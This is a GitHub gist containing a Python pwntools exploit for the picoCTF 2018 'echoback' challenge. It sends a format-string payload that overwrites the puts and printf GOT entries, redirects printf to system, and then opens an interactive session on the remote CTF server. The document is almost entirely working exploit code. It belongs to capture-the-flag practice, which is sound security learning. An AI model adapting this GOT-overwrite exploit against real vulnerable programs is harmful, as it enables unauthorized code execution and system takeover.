Skip to content

Instantly share code, notes, and snippets.

@caioluders
Created June 8, 2019 02:31
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save caioluders/94c01e169a9038db31ed8e6d8d83f54e to your computer and use it in GitHub Desktop.
Save caioluders/94c01e169a9038db31ed8e6d8d83f54e to your computer and use it in GitHub Desktop.
from pwn import *
#p = process("./echoback")
p = remote("2018shell.picoctf.com",37402)
e = ELF("./echoback")
print p.recv(1024)
payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
print len(payload)
f = open("exp","w")
f.write(payload)
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment